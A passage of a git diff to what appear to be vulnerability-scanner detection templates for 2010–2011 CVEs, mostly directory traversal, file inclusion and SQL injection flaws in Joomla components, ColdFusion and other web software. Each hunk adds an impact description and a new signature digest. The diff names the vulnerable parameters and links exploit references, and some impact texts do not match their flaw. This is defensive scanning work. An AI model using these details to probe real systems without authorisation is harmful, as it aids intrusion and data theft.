retrieve arbitrary files from the server, potentially leading to unauthorized access or sensitive data exposure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12623 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204fb78de3af1c8012601e7112a972de40e6aa647c2bc10efaf6ceed29c14e5d1d022100a1733aace7f15c711f66ca7bbccc90bae9735a59482ec01f4d736807e8b55394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df58fff1f3c41f0bb2e7cffc588de1539e3e3836befa9de4e1f06a5d9f04c2b802210083af992f09518510d80aa9a38b8c07453e81628f93cbc5b0fd36fc2e1a883bae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 038e4f83ff..68a18af5de 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12607 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e1f15dbfd8fe39c94929c260722ba127e377764fe39a59d6c987f9ce54da4efb022100ef0493a54e236ea7edbb462b01d85272f079cdced35009ea0efb61e04168202c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c37d961964fbcd929dedc795e0f58c194527654157a2f86ca940108ed06c346a02203292c5ccaacb2231fa3525be77ab8b74a27cba4f28c35e587fdbac39b44c4da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index c6d126d29b..e5efbbbe3f 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10946 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ac1505d814f9f4c9c9d46b86b9a41ab8ed267eee4c77dc8c99e055b2787f72b9022100d705ba7908b9e6c9a58251c109477545cd2fec28922b29fe23d940f5f2308603:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220731b630d781a49cbe5204a65cc925bf89702091e3a9e7aa70850fde793905752022100deb1699185259f6c8fe823f320455fdfcb2e7bb021f5809ad5e3e85ce3c54510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 6a549c25f2..636f1db8e8 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. + impact: | + An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ecda0d3507d14cfd1876d3d51d9d8e3219209e2e63c77e6f792912aa8360314d022100f5e2d29c5f2c9a8bc86893d04c365169012651f4f6a0f18b0e5c050ccaed4ddc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d40ba8b9b481ae166888c551f72da68db055a11093fb78111e3b2c6b1d0b8d900221009e3b4258da5e1f03ffd3b1e4bdf63f4eb9985b20af64a31b8e0769ed840960ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 128ebe3b9e..155ed6a142 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/13981 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022039f6110cabc617afd3e96b2fc42b914b3c9ad6e15797a38c066f2b7230ec9b92022100d6ed6291d2c1aa3ea282916d08d23459c4abdb22f7a2a23e5996b08311df80fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eec0a10467257dc4fe9e5b4bb4eaddfcea252a543161ea0d283d5a72bac72120022001467f6d2b1303150b144f8e62a51b12e036c7e89d9d225514b357f39c403000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 615f4ca0ad..fdc42c72a3 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! website. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14017 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bcd66f91f8905f8ee9afb4cc9c3b87bbbb97c29a7304afb8b1732dfd63db494f0221008d95c6d23d088a8391654b722965c64308378f94bd199e551781f7786fd678a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077113634884da4ef865ca94b2ee7df0fee6a54b02d65864d8d0914f3b6addbf002203a926595b9b2d25ef287c355308f11792796d904556fe01207c800a15d99645a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 28b6bfab03..f5d389cf57 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14274 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a20dd9cc0bf9b879e7a93a855852d5e1ff0c4495105c1cb3386ccd491ae07574022100870d2b4947a1bdf4bc7acfe78be79aa68ad56fb7881ca6d0095860d69b56a6c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5dd079a5e74c0a667d179123e54dcd75cb9f630efc5a27b28d4c19fa90806a3022100cef8eb3f80950d53aff9eac487482525a1cd731182acca02eee4b5b6087c23b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index e0ec0fb834..9c8c59e8dc 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. + impact: | + This vulnerability can lead to unauthorized access to sensitive information and potential compromise of the affected system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eea23236dfb2c8260879245cb52248481874bf8ea9a3218eaecdfc2f59fcd9b902204f286b1a52b1656aa66630f1bbe719f784974223f834fdf756b1613ca130d313:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008fdd973723abb3ec0f3e399df369a16f587425edad3a51994b1888d60ed65bd9022022ac61a31821cc6a16fd4b12a5f8e402090c01bfc530b8662c11381d13c862c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 8248ee9f4b..37c55cc45b 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + impact: | + Remote file inclusion vulnerability in Joomla! Component Visites 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/31708 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210096377401fd96f22359d82625f1928df2de7ae04492895cc1c477714ceebc56c8022010f6c8dc2c9bdfe56eb19aeff95eb8ff7f5a02eb7ebdeba6981b5af5b5268a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed26b0bbeaaba277168e22d6c019818acb8019c5313cd05227b14a379490d391022100b173aea58b5b7b7343ec98009ef6d65eeb69e8de3364a5957050537d3b2673e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 77e359433d..1f104bcb7c 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14845 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206015ea2e49a49da3dae0795f8d72ca47ad97d00c810edb8909f86f8367a3dffb022100e1168138398e311b8e90dcdd953854629d94603f777c0b3fe29c59ed0e1ebf81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055282e097cada824716a1132835910ae549eda512b08b7d249ca747743d2699a022100aded409dcfe3fd85214075406aa8b20d6de14eebcb958fdd9966de08a109fc38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 0cac866348..123ebd7f49 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14964 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022071b2e39d247368321fe26a870c1863dfc4a967361f5f67cb9e693ed5ca5c7b690220735e83f2c4359bbe56779d43b01a77a8d5b9813d55bbcb17cd911478bef808ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b095b1d1d4407f08447f760c1185c842baaf9bc39358cd1a6d9c6d5c5456f0f022001934471878708a173e28ab337ae303cd8e64fb9c3e3e59df52cadc20fb6b58c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 8c80b27a70..540972ae41 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + impact: | + An attacker can exploit this vulnerability to access sensitive files and directories on the camera. remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202652fc98e97327ea39af4374a1bd7fdc2283c67b89c4088a8004384d181166ad022100de4f26d7e5d3d03e25674d1416d86859dda95aab12e47928de4fee82dd63f332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f95311eb9d11414e153cc82bf81e5ae3c46cbd6531189658fb6d14fc3fb82ae02210091aef93930a52079339893e4a31eb22528474821ec81b1cf2d97e8344fea0ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index a33598d2e7..fafad30e1c 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -5,6 +5,8 @@ info: author: 0x_akoko severity: critical description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability. reference: @@ -40,4 +42,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100e32971dcd8a98425c8debf614fcd5d835d07bac4b62b0a569104508aac1c9d02022100cc91e91ad102119063c909d5590726ea69cec3947ce1b2f48416b00cecfc3b5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090c56e842aeb3570e427312f5aee63103c4b7521f430ae37bdf3307a3d3147c8022065ff372bacb5bda3d4f03c53a39317a8bb9fe0aaa14e20f4eebfd32acf972065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 81a2697d9d..aba32eb286 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + impact: | + An attacker can exploit this vulnerability to access sensitive files containing confidential information, such as configuration files or user credentials. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15643 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204a0689ae7e2b94e685165427ca5a1dbd1b254f8a1293c3189c1011856b84a392022100fd9c36b8cdb35f035b2d4caeef0d789dcc5655ab507ef1c156fc13b7ffc62979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cbf7398b57938fea537f5a30f8781a9a7094027c0aa7ffb5b94f2e75c71e722c02210090225f538796981048a678a70a32955fa592c09a8d9b86af85f2dca137f4d264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index bf32a4874f..ace71e97db 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15791 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220751daf98adf2fc76934784b506a2c313a9dd325da74db77eae0a899a5604ffe4022100b96e21a4ede659a8c6da54c294a86ed5fa7dcf1f33dac72cac2ef36ed15ef7c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e304c93872774375c9e2f40a3ea3a62a2e718f2373aa7d717296bea538a9d5602204a3b5200b63cb849e7d2f3dd9dfff012c07cdb6472472b0188f5c953fe181dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 262ad8f1ba..4dbae68153 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to further compromise. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15749 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022056706eff2101e1608f470f1ed1ab9fca43ca055c5e0736b57a12f9da101e52480220217cdd8750c4ba9af1b49959c7315b35401106349adc128cb24d039896392be4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1f8a372c1bd7932dce981902ac35522c36e7998e6ebca24a9674c9a95dbb83e02206b50e0d0af2f400db04740e43eeb43f9d9ba537f771047dc85207c54326376ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index ecc5ddf385..ed3e5618d0 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15585 @@ -37,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1a0c3416a934165ab086fd764ec201e91351d2d4e3a11a5744fed0196265ee702203dbdf6d49f76074c9ddaeb09f1952e3c691a4a8b64004d3d5caf5232b4ca3696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100acb1d49a85e8148634326e4c540adb9cbae3fd6807926467774e19b92ba508a2022100ff8ae67f23946a9a48b56c85d74a003f211d02b379ed1d446234f3fb2f4ca887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index dddc1d3084..4a1c1bd897 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34250 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022026b8a76df6727bda4609be663e800e4cf7307d6348437e4c3e640cd3229b3cfe02204695e1e6810dc71e385251a2416a9ccd9f78d09e04b05e3fa277ab29b41278a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a92230f9eac5cba3cbd4791acec5b8cf3cd4a0762c4b3bb3aaca79e5d4f5e61022100d187141dbf118e5c522c0b10a8e03d9339dfa8c86a02fb2ac445b9be7b74c57f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index fdaad34b5b..4060c4e39c 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12601 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220243c914cc636e6fe2ccaaa26bc1684ac9b0f4c2b7be8d6ba831b4b12e304a5380221008081d8aa6eb727d81a33d509c1ce0e14fcd3d10cc6784f445a42912b2cc6f865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f9a4d2c0299973501883e58d5c3a97b018103699cb9b3631ec1cdabc4a8adfa602207c1c3c3aa91f435b358f0c3b805b814035f680e56429822d17f4fef3ed0451a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 7ce094a5c5..abf68c25d8 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Apply the latest patches and updates provided by MODx to fix the LFI vulnerability. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fe9f307e9f81a5335488b4fb4096ac2369154670a82fe8c177b53bcbdb45a1d2022048032106cb02da6d0a955729b170bd5fabf68fe23f3bfc9599e7810e36ca1af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f081c8c91e4617e57f2d789627f44bbe9800bf9091202355b24fecf7ae94dd60221009e2b1786ca510e019b852ba7ab30f16dfa4ca4749bf2af388ff29fd8cb580b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 9707be3693..05e054c6da 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Arbitrary file inclusion leading to remote code execution remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34837 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee2e79350670f365f41c530b1e8cc1e242a82ae70adc1152c366feabb9a5496a022100c2989851fa54f6b1b22a25489996483eeb82339fac23032402b077c9c3222c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026c6160757337260f02182e7da5247cd3375279bda0cb4019649d4d424ad7f820221008b06dbaf2dab8b4048049c3bb9dff509b4835cb93b748812a506ce7da9f72922:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index deb19ffc8b..61a9a50fb9 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. + impact: | + This vulnerability can lead to unauthorized access to sensitive files and data on the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/16103 @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206ca422d66ad876e6107ea812d536d7235747bc439bfd0244b238b90ac0b6f3f3022001e1db5cb3bfc0822b08b51e4898753807b14750bd10030d7e041ae2c8e69cc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097d65a61847a71cf146303c48b07acbe6ee9573724d9b8a50d2bd5eb79462b780220062ff7750adae7407b954879fb76f5894ae9e28a09651cd9eb7cea7ddaada2d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index b6bb1f47b2..5528047a15 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + impact: | + An attacker can read arbitrary files on the server, potentially leading to unauthorized access to sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022009da50f959ea77102bd6c708c7a73038671dfcc9c510ea3e4c680f0e99d3c1b70221009c2237750474a6f5c9c66ece823f4e1e717d377c2c4c3d7918fab2c0f408aa6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b8f0bcba9fcb205a9e391e62ed56c7e34cdde7e59250198d678127ead4b9cef0220695a0b07debc640b341399be8b0ab088773c4e7e27cfb7b583f69432fb98935f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 428f52d932..512b1d1609 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system. remediation: | Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a8e8920aba07fc0c1a26f58049ff9bc7238f8fab2c74e628b9d4240414007fdd02205bd18c7c250462d06b3e40d3f422ef7471c0aee0aae7ca5f8fd43ba938adc719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e52378d2ad2631ef3866dc183c3d7e50e433fb239c2bf582d9743eb3ae8fbd430220419e2e3f855267e9a4cc1f49022609788d95e7e531a7ef02b34f9af4fdb62d45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 2b94dcb98e..fc79abbd29 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different 